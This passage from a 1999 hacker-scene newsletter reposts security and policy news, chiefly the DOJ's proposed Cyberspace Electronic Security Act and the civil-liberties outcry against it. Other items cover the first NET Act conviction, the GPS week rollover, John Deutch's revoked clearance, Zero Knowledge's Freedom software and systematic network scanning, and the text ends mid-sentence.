synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 DOJ contemplates secret searches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ SECRET SEARCHES FROM DOJ by BHZ, Tuesday 24th August 1999 on 2:34 pm CET InfoWar published a briefing on public policy issues written by Center for Democracy and Technology (www.cdt.org). "The Justice Department is planning to ask Congress for new authority allowing federal agents armed with search warrants to secretly break into homes and offices to obtain decryption keys or passwords or to implant 'recovery devices' or otherwise modify computers to ensure that any encrypted messages or files can be read by the government". Read the briefing here. 8/23/99 DOJ Proposes Secret Searches C D T P O L I C Y P O S T A BRIEFING ON PUBLIC POLICY ISSUES AFFECTING CIVIL LIBERTIES ONLINE from THE CENTER FOR DEMOCRACY AND TECHNOLOGY Volume 5, Number 19 August 20, 1999 CONTENTS: (1) Justice Department Proposes Secret Searches of Homes, Offices (2) If the Government Wants Your Data, It Should Come to You For It (3) Proposal Also Sets Standards for Access to Escrowed Keys (4) Subscription Information (5) About the Center for Democracy and Technology ** This document may be redistributed freely with this banner intact ** Excerpts may be re-posted with permission of ari@cdt.org This document is also available at: http://www.cdt.org/publications/pp_5.19.html (1) JUSTICE DEPARTMENT PROPOSES SECRET SEARCHES OF HOMES, OFFICES The Justice Department is planning to ask Congress for new authority allowing federal agents armed with search warrants to secretly break into homes and offices to obtain decryption keys or passwords or to implant "recovery devices" or otherwise modify computers to ensure that any encrypted messages or files can be read by the government. With this dramatic proposal, the Clinton Administration is basically saying: "If you don't give your key in advance to a third party, we will secretly enter your house to take it if we suspect criminal conduct." The full text of the Justice Department proposal, a section-by-section analysis prepared by DOJ lawyers, and related materials are available at: http://www.cdt.org/crypto/CESA. The proposal has been circulating within the Clinton Administration since late June. On August 5, the Office of Management and Budget circulated it for final interagency review. In the normal course, after all potentially interested agencies have been consulted, the proposal would be transmitted to Capitol Hill, where it could be introduced by any Member, or offered as an amendment to pending legislation. (2) IF THE GOVERNMENT WANTS YOUR DATA, IT SHOULD COME TO YOU FOR IT The proposal is intended to eliminate a core element of our civil liberties. Normally, under the Fourth Amendment in the Bill of Rights, when the government wants to search your home or office, the government must obtain a court order issued by a judge based on a finding of probable cause to believe that a crime is being committed AND the government must provide you with contemporaneous notice of the search -- show you the warrant and leave an inventory of the items seized. This notice requirement has ancient roots. It is based on the notion that the judicial warrant (issued on the basis of the government agent's untested assertions presented to a judge in private) does not provide adequate protection against abuse. Notice is important because it gives you the opportunity to observe the conduct of the government agents and protect your rights. If the agents are exceeding the scope of the warrant, for example, you can even rush down to the courthouse and ask a judge to stop the search. And after the search, you can exercise your rights for return of your property and otherwise defend yourself. Over time, our society has tolerated exceptions to this rule. For example, the government can enter secretly to plant bugs to pick up oral communications or to bug your phone, but that is quite rare. Most wiretaps do not involve entry into the home. A few courts in a few cases have allowed so-called "sneak and peek" searches, in which government agents can enter surreptitiously, provided they don't take anything. And in the name of foreign counterintelligence, the government has long conducted "black bag jobs," such as the one in which they searched the home and computer of CIA employee Aldrich Ames. The new DOJ proposal is a huge expansion of these previously narrowly defined exceptions. The proposal takes extraordinary cases at the fringes of the law and makes them routine, given the increasingly ubiquitous nature of computers. Thus, the encryption debate, which up until now has been about privacy and security in cyberspace, is becoming a struggle over the sanctity of the home. (3) PROPOSAL ALSO SETS STANDARDS FOR ACCESS TO ESCROWED KEYS The proposal also includes detailed procedures for government access to keys and other forms of decryption assistance stored with third parties. Again, the essence of the DOJ proposal is government access to keys without the knowledge or cooperation of the crypto user. The DOJ claims that these key recovery provisions provide greater protection for lawful users of encryption, by making it clear that a third party holding a decryption key or other recovery information cannot disclose it or use it except in accordance with the procedures set forth in the Act. The DOJ-drafted procedures are complicated and unique, turning on unanswered questions of what is "generally applicable law" and what is a "constitutionally protected expectation of privacy." They fall far short of protections proposed by Sen. Patrick J. Leahy (D-VT) in the Electronic Rights for the Twenty-First Century (E-RIGHTS) bill, S. 854, described at http://www.cdt.org/crypto/legis_106/ERIGHTS/ In any case, few individuals use third party key recovery, and there seems to be little individual or corporate interest in key recovery for communications, so even the strictest procedures for access to escrowed keys would be vastly outweighed by the proposed secret searches of homes and offices. In the small comfort department, the DOJ proposal makes it clear that key escrow or third party key recovery would not be mandatory. (4) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center for Democracy and Technology, are received by Internet users, industry leaders, policymakers, the news media and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. To subscribe to CDT's Policy Post list, send mail to majordomo@cdt.org In the BODY of the message (leave the SUBJECT LINE BLANK), type subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with NOTHING IN THE SUBJECT LINE and a BODY TEXT of: unsubscribe policy-posts (5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. Contacting us: General information: info@cdt.org World Wide Web: http://www.cdt.org/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 End Policy Post 5.19 Aleksandr Gembinski Webmaster etc. Center for Democracy and Technology 1634 Eye Street, NW 11th Floor Washington, DC 20006 (v) +1.202.637.9800 (f) +1.202.637.0968 http://www.cdt.org/ @HWA 04.0 FIRST NET CONVICT WILL DO NO TIME ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Monday 23rd August 1999 on 9:30 pm CET The University of Oregon student who last Friday pled guilty to felony cyber-crime charges and in so doing became the first-ever person convicted under the No Electronic Theft (NET) Act, will not do any jail time. The student will be sentenced Nov. 2 - and although he faces a maximum of three years in jail for his conviction on one count of "criminal infringement or reproduction" of commercial software - his plea arrangement assures that he will not see the inside of a jail cell, altough he still is saddled with a felony conviction according to the deputy chief of DOJ's computer crime division. Story on Newsbytes First NET Convict Will Do No Time - Update By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 23 Aug 1999, 12:31 PM CST A University of Oregon student convicted of distributing pirated software over the Internet will not spend any time in jail under a plea agreement with Department of Justice attorneys. The student last Friday pled guilty to felony cyber-crime charges and in so doing became the first-ever person convicted under the decade-old the No Electronic Theft (NET) Act, Newsbytes reported last week. The student was accused of pilfering thousands of business and entertainment programs and posting them, free-of-charge, on his Website, said David Greene, deputy chief of Justice's computer crime division. Before the NET Act was passed, prosecutors had to prove that cyber- thieves received "commercial benefits" from their thefts in order to win convictions. But the NET Act closed that loophole. The student will be sentenced Nov. 2 - and although he faces a maximum of three years in jail for his conviction on one count of "criminal infringement or reproduction" of commercial software - his plea arrangement assures that he will not see the inside of a jail cell, Greene said. Still, he is saddled with a felony conviction, and Greene hopes coverage of the case will deter other software pirates, he said. Earlier this year, some congressional Republicans questioned why there had been no Department of Justice prosecutions under the NET Act. DoJ called yesterday's conviction a clear message that Justice is enforcing the law. "We are not going to bring hundreds of these cases," Greene said. But DoJ is "trying to discourage (computer piracy) as a hobby." While such thefts may seem comparatively innocuous, they have "done some real damage to software companies," Greene said. Reported by Newsbytes.com, http://www.newsbytes.com . 12:31 CST Reposted 12:31 CST ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2318386,00.html?chkpt=hpqs014 -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Feds convict first Internet pirate By Reuters August 20, 1999 5:22 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2318386,00.html?chkpt=hpqs014 WASHINGTON -- An Oregon college student who gave away music, movies and software on the Web has become the first person convicted of a felony under a law punishing Internet copyright piracy, the government said Friday. Jeffrey Gerard Levy, 22, a senior at the University of Oregon in Eugene, pleaded guilty to violating the No Electronic Theft Act of 1997, the U.S. Justice Department announced. The Justice Department said Levy admitted that in January of this year he "illegally posted computer software programs, musical recordings, entertainment software programs and digitally recorded movies on his Internet Web site, allowing the general public to download and copy these copyrighted products." A Justice Department official said there was no evidence that Levy had made any profit from the freely available works. Anybody who distributes 10 or more copyrighted works with a value of more than $2,500 can face up to three years in prison and a fine of up to $250,000. Levy faces sentencing Nov. 2. @HWA 05.0 NORTON ANTIVIRUS 2000 IS OUT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 24th August 1999 on 3:17 pm CET Symantec (www.symantec.com) published Norton Utilities 2000, Norton AntiVirus 2000, and Norton CleanSweep 2000. Norton AntiVirus 2000 has two new features - support for automatic scanning of incoming e-mail attachments from POP-based applications such and it can automatically eliminate viruses in multiple compressed file levels, such as a Zip file inside another Zip file. @HWA 06.0 SSL CPU CONSUMPTION CAUSES CONCERNS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 11:50 am CET A recently released study by research and consulting firm Networkshop, found that various combinations of servers, processors, operating systems and online content used in conjunction with Secure Sockets Layer (SSL) can hamper the performance of Web servers. SSL helps secure e-commerce transactions, but these new findings suggest that its CPU consumption may end up impeding those same transactions. Full story SSL's CPU appetite causes concern Amy Rogers Washington, D.C. - Secure Sockets Layer (SSL) technology helps secure E-business transactions, but its voracious consumption of CPU space may end up impeding those same transactions. In a study released this summer, research and consulting firm Networkshop, Ottawa, found that various combinations of servers, processors, operating systems and online content used in conjunction with SSL can hamper the performance of Web servers. Networkshop paired Linux, Windows NT and Sun Microsystems Inc. Solaris with Web servers including Apache, Stronghold and Microsoft Corp.'s Internet Information Server. Windows NT plus Intel Corp. processors tended to better handle the task of processing SSL's complex algorithms, he said. Slow performance could lead to frustrated or lost customers, so VARs implementing E-business solutions might want to examine several types of products that offload encryption processing from the server itself to another device. These products include PC cards or server cards, such as Rainbow Technologies Inc.'s CryptoSwift; encryption-offloading units that sit on the network, such as those from nCipher Corp.; and so-called Internet Commerce Appliances, such as IPivot Inc.'s Commerce Director 8000. Such devices, including IPivot's Commerce Accelerator 1000, an entry-level version of Commerce Director, free up Web servers to perform tasks other than crunching numbers. CryptoSwift offloads 200 SSL transactions per second, said Bob Bova, director of business development at Rainbow Technologies, Irvine, Calif. Rainbow is seeking resellers that add "significant value to security technology" to add to its stable of partners. Already 15 VARs and integrators are on board, he said. Copyright ® 1999 CMP Media Inc. 07.0 Bug in Bill Gate's Anus? ~~~~~~~~~~~~~~~~~~~~~~~~ Aug 27th SmoG sent this in... http://support.microsoft.com/isapi/support/pass.idc?Product=Bill%20Gates%20Anus In case it has been replaced by the time you read this the following headlined a bug report form on Microsoft's tech support page "Do you think you've found a bug in Microsoft Bill Gates Anus?" With the submission form following the header... @HWA 08.0 CESA Causing Outrage In Libertarians ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague The 'Cyberspace Electronic Security Act', which HNN has previously reported on, is drawing much criticism and causing outrage amongst civil libertarians and high-tech industry trade groups. They say that the act not only violates Civil Rights, but "would make police break-ins far more common than they are now." While law enforcement agencies claim that encryption is detrimental to their job of tracking criminals and crime, most seem to feel that it is just another way the current administration will attempt to impose 'big brother' monitoring powers over American citizens. MSNBC http://www.msnbc.com/news/302945.asp Furor rising over PC wiretap plan Civil libertarians, trade groups outraged by DOJ proposal that would ‘booby-trap’ PCs. But will Congress go ‘ballistic’? By Maria Seminerio ZDNN Aug. 20 — A U.S. Department of Justice proposal to make it easier for police to break into homes and access computers is drawing a furious reaction from civil libertarians and high-tech industry trade groups. THE DRAFT LEGISLATION, for which the DOJ hopes to find a sponsor in Congress, is dubbed the Cyberspace Electronic Security Act. The law would make it easier for law enforcement officials to obtain from judges a now-rarely-used authorization to break into a suspect’s home and plant a hidden listening device. But in this case, the computer equivalent of the “listening device” is the authorization for investigators to disable data-scrambling encryption programs on PCs. (In order to actually copy data from the computer, police would still need a separate warrant from a judge.) DOJ wants clearance to bug PCs ”(The proposal) strikes at the heart of the Bill of Rights,” said David Sobel, general counsel for the Electronic Privacy Information Center. Noting that judges in all federal and state courts combined only issued 50 warrants for so-called “surreptitious physical entries” last year, Sobel said extending such authorization to cases involving computer files “would make police break-ins far more common than they are now.” ‘BOOBY-TRAP YOUR COMPUTER’ The proposal would “basically allow investigators to booby-trap your computer ahead of time” by disabling encryption, he said. The proposal was most likely spurred by the frustration investigators have experienced when finding encrypted data on computers used by suspected drug dealers and other criminals, he added. DOJ officials did not respond to requests for interviews Friday. But in a letter to House Speaker Dennis Hastert, Acting Assistant Attorney General Jon Jennings said the new law would aid investigators when information needs to be deciphered “in a timely manner.” “While under existing law, law enforcement is provided with different means to collect evidence of illegal activity, these means are rendered wholly insufficient when encryption is used,” wrote Jennings in the letter. “In the context of law enforcement operations, stopping a terrorist attack or seeking to recover a kidnapped child, time is of the essence and may mean the difference between success and catastrophic failure. “While existing means of obtaining evidence would remain applicable in a fully-encrypted world, the failure to provide law enforcement with the necessary ability to obtain the plain-text version of the evidence makes existing authorities useless,” he wrote. EPIC: CONGRESS WILL GO ‘BALLISTIC’ Noting that the proposal would need to find a sponsor in Congress and then be passed into law before it could take effect, EPIC’s Sobel said it could encounter resistance by lawmakers. “I think people in Congress are going to go ballistic over this, particularly since it’s coming right on the heels of the FIDNET” controversy, he said. FIDNET — the controversial proposal to monitor government and some private networks for hacking activity — came to light earlier this summer and remains in limbo. Barry Steinhardt, president of the American Civil Liberties Union, said that the Federal Bureau of Investigation has often misused its powers in the past, and could do so again under the DOJ proposal. “There’s every reason to believe they’re not just going to look at the Mob using the powers sought under the proposal,” Steinhardt said. “They’ll use this power to interfere with protected speech.” Also condemning the plan were the Computer and Communications Industry Association, the Center for Democracy and Technology, and Americans for Computer Privacy. CLINTON ADMIN: BIG BROTHER? The plan is “an unprecedented attempt by the Clinton administration to impose ‘big brother’ monitoring powers over American citizens,” ACP officials said in a statement. “The fact is that current laws provide law enforcement broad powers to obtain information.” “This is another attempt by law enforcement to do an end-run (around encryption),” said Ed Black, president of the CCIA. “It offers a real temptation for investigators to overreach and overextend” the current limits on searches and seizures, he said. “Anybody’s vulnerable,” Black added. ”(This) resembles something the KGB would propose.” @HWA 09.0 ReDaTtAcK Arrested, Questioned, Charged, Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Wizzy24 After electronically breaking into the General Bank of Belgium, ReDaTtAcK has been apprehended. He was traced via his cell phone and then arrested and later released. He has not been charged with computer intrusion as Belgium has no such law. Instead he will be charged with electronic eavesdropping charges after breaking into SkyNet a Belgian ISP run by the state owned telephone company Belgacom. ReDaTtAcK has stated that he will continue to do what he does. The Standard - Dutch http://www.standaard.be @HWA 10.0 Some GPS Systems Fail With Date Rollover ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid While the GPS satellites themselves and most GPS receivers continued to function normally some units failed when the GPS date rolled over this past weekend. Many Japanese users of in car navigation systems experienced complete systems failure when the date rolled over. Four Japanese manufacturers of GPS systems have completed updating a little over half of the GPS systems sold in the country since 1996. Yahoo News http://dailynews.yahoo.com/h/nm/19990822/tc/gps_japan_1.html Sunday August 22 1:10 AM ET Irate Japanese Car Drivers Hit By GPS Bug TOKYO (Reuters) - A steady stream of irate customers called Japanese car navigation makers Sunday after their automotive directional devices failed due to a computer flaw. The screens on some car navigation systems went blank while others froze up as a computer bug struck Global Positioning System (GPS) devices, electronics company Pioneer Electronic Corp said. Pioneer, one of several car navigation system makers battling the bug, had received several hundred phone calls since the problem started at 9 a.m., a spokeswoman said. About 450 Pioneer workers manned telephone lines and staffed service centers over the weekend to help customers with the GPS problem, she said. Some 95,000 car navigation units sold in Japan may be unable to cope with an internal date change in the system, the Ministry of International Trade and Industry said. Four Japanese manufacturers of GPS systems have completed updating only about 170,000 of the estimated 260,000 units sold in Japan since 1996 and believed to be still in operation. Japanese drivers are heavily reliant on the navigational devices because most streets in urban centers such as Tokyo are unnamed and follow curving paths laid out among a tangle of property lines. Japan's Maritime Safety Agency has received reports that ships with older GPS systems are in or near territorial waters but has not received any distress calls as of Sunday noon, a spokesman said. At midnight GMT, the 24 satellites of the Global Positioning System, which provide navigational data from 17,700 kilometers (11,000 miles) out in space, switched their timing system back to zero. The rollover is because the system, which uses radio signals from satellites to provide navigation data, was designed to ignore calendar dates but keep precise time measured in seconds and weeks. Only 1,024 weeks were allotted from January 6, 1980, before the system is reset to zero. @HWA 11.0 Security Search Engine MindSec Goes Online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Erik www.mindsec.com goes live today, providing a search engine to search 90 different sites that are security and administration related. MindSec will also have product reviews on admin and security applications and hardware. MindSec http://www.mindsec.com @HWA 12.0 CIA Ex-Director Security Clearance Revoked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Erik John Deutch, former director of the CIA, has had his security clearance revoked after it was found that he kept classified material on his home PC. Yahoo News http://dailynews.yahoo.com/h/nm/19990822/tc/cia_3.html Sunday August 22 12:02 AM ET CIA Suspends Ex-Director Deutch Security Clearance WASHINGTON (Reuters) - The CIA has suspended security clearance for its former director, John Deutch, who was found to have kept classified material on a computer at his home. A CIA statement Friday said clearance for Deutch, the Central Intelligence Agency director for 20 months up to December 1996, had been suspended ``for an indefinite period of time.'' The decision followed a review of the case by the current director, George Tenet, and a decision by the Justice Department in April not to prosecute Deutch. The statement said that although a report by the CIA's Inspector General ``found no evidence that national security information was lost, the potential for damage to U.S. security existed.'' Newsweek reported in April that 31 classified documents were discovered on a computer at his home in a routine check after Deutch, a pillar of the Washington establishment for decades, left the agency. Deutch issued a statement through the CIA Friday saying: ''...I erred in using CIA-issued computers that were not configured for classified work to compose classified documents and memoranda.'' He said: ``Although I accept responsibility for my mistake, I want to make clear that I never considered the information to be at risk or intended to violate security precautions. But good intentions simply are not enough. Strict compliance is the standard.'' Earlier this year Deutch was appointed to head a commission reviewing security at science laboratories after reports of Chinese spying at nuclear facilities but he withdrew as reports of his own misuse of classified materials emerged. @HWA 13.0 GAO Releases Report on Risk Assement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In an attempt to give federal agencies some sort of guideline on how to secure their systems the Government Accounting Office has released the Information Security Risk Assessment: Practices of Leading Organizations report. The report details security programs used by four unnamed organizations, which included oil, financial and computer companies and one federal regulatory agency. The report goes on to identify seven critical factors of a successful ongoing security risk-assessment program. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0823/fcw-newsgao-08-23-99.html General Accounting Office http://www.gao.gov FCW; AUGUST 23, 1999 GAO report tries to sort out risk-assessment confusion BY DIANE FRANK (diane_frank@fcw.com) Facing growing security threats to increasingly complex government computer systems, the General Accounting Office last week released a report to help federal agencies determine how vulnerable their systems are and how to make them more secure. Although GAO's report, "Information Security Risk Assessment: Practices of Leading Organizations," does not present specific suggestions for agencies to determine how to secure systems from cyberattacks, it identifies seven critical factors of a successful ongoing security risk-assessment program, including defining and documenting procedures and results. The report details programs put in place by four unnamed organizations, which included oil, financial and computer companies and one federal regulatory agency. GAO did not name the organizations because it feared that hackers might target them. The report also includes diagrams detailing the risk-assessment process for each organization and a description of how they made their decisions. For example, the regulatory agency conducts risk assessments "to determine the applicable security controls," the GAO reported. "This is done by determining which of a pre-defined set of controls is appropriate for individual business operations and comparing what is appropriate to controls already in place to identify and address gaps." The best practices outlined in the report will be helpful, especially at smaller civilian agencies that do not have the resources that department-level agencies have, said John Gilligan, chief information officer at the Energy Department and co-chairman of security on the CIO Council's Critical Infrastructure, Privacy and Security Committee. "I think it will be useful for people who are charged with risk management to have examples of what others are doing," he said. This is especially true because security and risk assessment are not one-size-fits-all concepts, said Mike Lortz, vulnerability assessment product manager at Internet Security Systems Inc. "The process needs to be different from agency to agency...but the agencies need to be able to use something as a guideline," he said. GAO intends the report to be a supplement to last year's executive guide on information security management. Risk assessment is only one of the five areas outlined in last year's guide, but GAO decided to focus its latest guide on that area because it is what most people in government seem to be worried about, GAO said. "When we did the original guide, during the exposure draft period we got some comments that [said] we should dig deeper into some of these areas, and more comments mentioned risk assessment than any others," said Jean Boltz, assistant director of governmentwide and defense information systems within GAO's Accounting and Information Management Division. Agencies have been confused about how to conduct risk assessment and apply that to the security needs they have, Boltz said, especially after the Office of Management and Budget revised its computer security regulations in 1996 and eliminated the requirement to perform risk assessments. Agencies have been confused about what to do because, although OMB no longer requires risk assessments, it still requires agencies to measure their systems' vulnerability to cyberattacks and unauthorized access and then base their security architecture on that knowledge, Boltz said. Agencies' confusion about risk assessment has heightened because of the increasing use of the Internet and because computer systems are becoming more interdependent, Gilligan said. "Risk assessment is a big deal because it has not been institutionalized," Gilligan said. "In the past, there had been great emphasis on doing risk assessment, but [it] tended over time to not be used or not be done well." @HWA 14.0 CESA Drives People to Freedom ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jordan The Cyberspace Electronic Security Act, a recent proposal, which if it became law, would allow law enforcement agents to break into your personal PC, is forcing people to seek out ways to protect themselves. One of the methods people have been looking at is Freedom from Zero Knowledge Systems. While the software is still in Beta it promises complete anonymity on the internet. Freedom Beta 3 is nearing completion and is slated for release during the first week in September. The new beta will have increased functionality, stability and ease of use. Freedom http://www.zks.net/clickthrough/click.asp?partner_id=542 Zero Knowledge CESA Info Page http://www.zeroknowledge.com/cesa/ CNN http://www.cnn.com/TECH/computing/9908/18/freedom/ Total digital privacy may be on the horizon August 18, 1999 Web posted at: 5:32 p.m. EDT (2132 GMT) In this story: How it works Freedom gets high marks U.S. encryption policy has its pros and cons RELATED STORIES, SITES By Robin Lloyd CNN Interactive Senior Writer (CNN) -- If American software developers were to touch any of the code in the 10,000 released beta versions of an Internet privacy solution that is getting good preliminary marks, they would be subject to prosecution. In fact, if Zero-Knowledge Systems were based in the United States, it would be illegal for the company to export its Internet privacy software, dubbed 'Freedom.' Instead, the Montreal-based start-up, headed up by 26-year-old Austin Hill, is set to release the first product of its kind -- a comprehensive Internet privacy package that offers multiple online pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge couldn't crack if it wanted to. No more cookies, e-mail trails and digital identity stealing. At least, that's the idea. More than a dozen "cookie killers" already exist, along with several e-mail and browser anonymity services such as anonymizer.com. Those all rely on what Hill calls a "trust-me" mechanism. A third party server holds users' identity and data. Freedom makes it so the end-user has sole possession of that data. "If there was a gun to my head, I still could not reveal or break the privacy of my users," Hill says. The user has the only "key" to their pseudonyms, which can be linked to independent e-mail addresses, geographic locations and encryption keys. Freedom is designed to protect the e-mail, chats, browsing and newsgroup searches of anyone from a Chinese dissident posting pro-democracy messages to an employee checking out listings for Alcoholics Anonymous. The software can encrypt private chats and newsgroup discussions, ensures anonymous Web browsing and can even block spam, Hill says. Each digital identity relies on full strength encryption that ranges from 128 to 4,096 bits. Freedom 1.0, which works only on Windows platforms, is set for release in late October or early November. It will be downloadable for $49.95. Macintosh and Linux versions are due out next year. Freedom doesn't work with America Online, however, since AOL is an online service separate from the Internet. Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7 convention in Las Vegas last month. Since then, it has released thousands more via its Web site. A total of 50,000 people have requested copies since then. How it works Web users leave traces of their identity behind every time they visit a Web site or send e-mail. To get a sense of the process, visit the Center for Democracy and Technology's site and use its demo. Freedom allows users to set up separate pseudonyms for different aspects of their lives -- an identity for an online chat about health care, another for interactions with friends and family, others for Internet browsing and finally a 'true' identity for e-commerce. Zero-Knowledge is working on an e-commerce identity protection solution for future versions. Freedom scrambles data coming from a user's PC and hides the source and destination of Internet traffic routed through the service. The message or data packet is first sent to Zero-Knowledge's servers where it is wrapped in a layer of encryption. That initiates a delivery process where the data bounces from one independently owned relay station to the next and can only be opened by one specific user who then forwards it to another specific user, with that process repeating several times. Eventually a data packet goes to its intended target but neither snoopers, nor the final recipient, have any way of tracing its origins. Third-party protections, the approach relied upon by Freedom's predecessors, can be hacked or bought away when the company makes a new acquisition, as was the case when Double Click acquired Abacus, Hill said. Or, civil lawsuits can force ISPs to turn over their records. Freedom gets high marks David Sobel, general counsel for the Electronic Privacy Information Center, and Ari Schwartz, a policy analyst with the Center for Democracy and Technology, agree that Freedom is a good solution. "I suspect that it is one of the best solutions that we've seen," Sobel said. Freedom's strength comes from Hill's philosophical commitment to preserving privacy and anonymity on the Internet, Sobel said. Schwartz underlined the Center's stance on Internet privacy -- software solutions combined with self-regulation among service providers and legislation will be needed to protect privacy online. The U.S. Congress has introduced several bills this session relating to online privacy but advocates say they may not go far enough. A CDT report concludes that online privacy is the exception, not the rule, in the private sector. U.S. encryption policy has its pros and cons The U.S. policy that prohibits encryption exports and labor is based on protecting security codes produced and cracked by the FBI and other national security agencies. The downside is that we may lose out on what has turned into a $1.5 billion cryptography business for Canada, where limits are less strict, Hill says. The U.S. approach could backfire and result in a brain drain of encryption experts, EPIC's Sobel said. "The end result will be that American companies will lose leadership in this field," he said, "and it is not going to result in encryption being out of the hands of anyone our government might be concerned about." @HWA 15.0 Who's doing the Scanning? ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Netsentry.net and all IPs in the 38.x.x.x range appear to be systematically scanned. Owners of machines in that range, which is controlled by PSINet want action to be taken, but what action? So far scanning is not illegal, so what can be done? And who is doing the scans and why? MSNBC http://www.msnbc.com/news/302835.asp Scanning for trouble Relentless computer ‘probes’ cause concern, but no damage yet By Bob Sullivan MSNBC Aug. 23 — Dragos Ruiu was just minding his own business, a Vancouver software start-up, when it started. Day after day, relentlessly, someone or some group out there on the Internet is banging away at his servers, sneaking in and gaining full access. A security expert, he knows what’s happening: He’s being probed. Is this mere sport, or a “casing,” like a bank robber who visits the bank several times to study its security systems before the heist? EVERY DAY they come, they lurk — then they leave without doing damage. And Ruiu is powerless to stop it. Every method he has tried, they have trumped. They’re toying with him. “They must feel like gods,” he says. They come at him through clients’ computers, through Canadian ISPs, once even through one of the largest Canadian banks. They hack into Linux boxes, NT boxes, Unix boxes. Hack by day or night. No matter. And all for no apparent reason. They look, but don’t touch. Ah, the life of a network administrator these days. There are thousands of ways to break into a computer, and there are now several downloadable software packages designed to scan the Internet for Web sites and servers that have just one flaw. According to Peter Tippett at computer security research firm ICSA, a new box connected to the Net will almost certainly be “scanned” before one week goes by. And the amount of scanning activity has doubled in the past six months. That’s about when the scanning started for Brandon Pepelea, a former employee at PSINet who says his collection of Web sites has been scanned systematically several times a week since January. In another example of a victimless probe, Pepelea thinks someone or something has been banging through all the Internet addresses between 38.240.x.x and 38.200.x.x, a so-called Class-B range of addresses that constitute about 16,000 possible computers. In his case, the scans were unsuccessful. Whoever or whatever it is, they haven’t been able to break into Pepelea’s computers. Still, the relentless, systematic nature of the probe has him spooked. He’s been demanding that PSINet, which owns all the addresses in the 38.x.x.x range, chase down the scanner and prosecute. “I don’t think they understand how serious it is,” Pepelea said. “The threat not so much being the nature of the scan but the scope of the scan… If you’re between 38.240 and 38.200 you’ve had the scans. They’ve walked through and gotten to you.” NOSE FOR TROUBLE The attack itself involves use of the Simple Network Management Protocol, frequently used on network routers. Pepelea owns machines between the 38.240 and 38.200 address range, and concluded scans spanned that range by studying patterns of hits to his own and his client’s machines. Dancing tantalizingly over the edge of the law, they show an ability to do far more damage. This is not the first time Pepelea, now CEO of a small security company he calls “Designer’s Dream,” has done a hefty amount of personal cybersleuthing. Last December, he compiled information on a virus writer named VicodinES, and shared it with the FBI, the CIA and other law enforcement agencies. His tips fell on deaf ears, and VicodinES, who the world now knows as Dave Smith, went on to release the Melissa virus. Pepelea’s hell bent on being heard this time around. “Once again, nobody cares,” he laments. PSINet said early last week the scans were being generated by an account serviced by the company, and that it had dealt with the matter by canceling the account. But by Friday, the company had canceled three more accounts in an effort to stop the probes. While officials there say they take the matter seriously, they are not convinced it’s an organized hacker attack. “It’s not possible to characterize whether this is a mistake, a malicious event, was planned, or it just happened,” said Cole Libby, Director of Network Engineering. For example, it could a wrongly configured piece of hardware searching a section of the Internet for a new printer. “There are lots of examples of technology out of control in the world.” NO HARM, NO FOUL? Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to see who leaves the front door unlocked, brings up murky legal issues. Entering someone else’s computer is illegal, but scanning, which amounts to asking a computer how it’s been set up, probably isn’t. Pepelea says PSINet told him to pursue legal action against his cyberpest — but for what? Meanwhile, Pepelea thinks PSINet should be liable if any real trouble ever comes from his suspected hacker, particularly since the Net provider was warned. That’s not likely, says Internet law expert Dorsey Morrow. PSINet would almost certainly face no criminal liability for the actions of a hacker on their network, and wouldn’t likely face civil liability either. “As long as they can show ‘We were doing everything we can. We’ve got security policies in place. We’re using the latest software.’ That mounts up to a pretty good defense,” Morrow said. So there’s no consequences for scanning, either to the hacker or the company that provides the means. But what of Ruiu’s hackers, who go just one step further than Pepelea’s scanners? They scan, then enter, lurk around, and leave. Dancing tantalizingly over the edge of the law, they show an ability to do far more damage. Their methods are painstakingly deliberate, designed to avoid detection. They launch attacks from multiple sites, sometimes sending no more than a packet per day from any site, in order to hide the kind of suspicious activity protective “sniffer” programs look for. “We saw one new machine coming at us every five minutes,” Ruiu said. “They must have felt like gods because they could break into any machine they wanted.” That includes a collection of Canadian ISPs, and even one major Canadian bank, the hackers broke into. When he called, Ruiu often had a tough time convincing victimized ISP administrators they’d been hacked. “The reaction of ISPs was 